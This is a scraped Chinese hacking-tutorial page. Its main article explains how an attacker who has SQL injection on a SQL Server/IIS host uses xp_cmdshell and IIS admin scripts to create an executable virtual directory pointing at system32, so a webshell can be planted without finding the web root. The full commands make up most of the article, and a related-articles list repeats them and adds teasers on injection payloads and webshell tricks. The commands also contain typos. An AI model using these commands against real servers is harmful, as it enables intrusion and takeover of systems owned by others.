sql注入建立虚拟目录_漏洞研究

sql注入建立虚拟目录,免得找web绝对路径
----------------------------------------------------------------
我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://xxx.com/win
403错误,表示虚拟目录建好了。。。

时间: 2024-11-15 17:07:14

sql注入建立虚拟目录_漏洞研究的相关文章

SQL注入建立虚拟目录,找Web绝对路径!_漏洞研究

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:  exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'  建立虚拟目录win,指向c:\winnt\system32 

sql server注入建立虚拟目录的方法_安全教程

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.

SQL Server 2000 注入防护大全(一)_漏洞研究

SQL Server 2000 注入防护大全(一) Sql注入早源于'or'1'='1 最重要的表名: select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses 最重要的一些用户名(默认sql数据库中存在着的) publicdboguest(一般禁止,或者没权限)db_sercurityadmin

SQL Server 2000 注入防护大全(二)_漏洞研究

SQL Server 2000 注入防护大全(二) 传统查询构造:select * FROM news where id=... AND topic=... AND .....admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'select 123;--;use master;--:a' or name like

Sql Injection in DB2数据库_漏洞研究

使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手.不过在网上很难找到相关的资料,只好自己研究了.  参考了IBM DB2的文档,总结了这样几条:  1.select NAME from SYSIBM.SYSTABLES where CREATOR =USER  可以返回系统中所有用户创建的表(table)名  2.select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''   返回表中的列名 

一个意想不到的注入点发现过程_漏洞研究

一般注入点是http://www.xxxxx.net/list/asp?id=Num这种形式的,不过随着注入技术的泛滥,有点安全意识的人都把明显的注入点过滤了,黑客站点就更不用说了.记得77169.的动画教程中好像有一个讲的就是注入潮阳网,偶记得好像是下载页面,字符型注入,注入页面是类似这样的http://www.xxxxx.net/list/asp?id=Num&ppath=undefined.为了证实我去试了一下,我测试的页面是http://www.cycycy.net/list.asp?i

用ADSI编程实现IIS中建立虚拟目录

conn.asp不再贴出.这里从数据库中读出目录名 <!--#include file="conn.asp"--><%'response.end  '//这是做调试时用的on error resume nextSet Rs=Server.CreateObject("ADODB.Recordset")Rs.ActiveConnection = MyConnectionSql="select * from 你的表名 where 你指定的条件&

如何在iisexpress里建立虚拟目录呢?

问题描述 如何在iisexpress里建立虚拟目录呢? 如何在iisexpress里建立虚拟目录呢.功能就是这个目录不在站点下,但是通过虚拟目录,就可以提供给多个不同的站点访问.从而达到上传目录统一管理的目的,在IIS里是可以实现的,iisexpress也是可以实现,但是不知道怎么修改配置,有朋友遇到过类似的需求吗?求指导. 解决方案 基本上和IIS差不多的处理

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们